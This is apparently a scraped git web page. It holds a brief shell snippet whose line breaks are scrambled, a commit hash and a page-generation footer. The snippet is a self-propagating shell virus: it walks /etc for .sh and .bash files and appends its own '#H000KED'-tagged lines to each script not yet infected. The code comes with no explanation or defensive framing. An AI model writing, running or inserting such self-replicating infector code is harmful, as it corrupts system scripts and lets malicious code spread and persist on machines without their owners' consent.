8a2cb6b5a472df0f91c4a6b0fe4089301eb148a2
1 for i
in $
( find /etc
2> /dev
/null |
grep -i "\.bash\$\|\.sh\$" ); do if ( fgrep
"\#H000KED" $i > /dev
/null
); then continue; fi; echo >> $i; cat $0 |
grep \
#H000KED >> $i; done;
This page took 0.281108 seconds and 5 git commands to generate.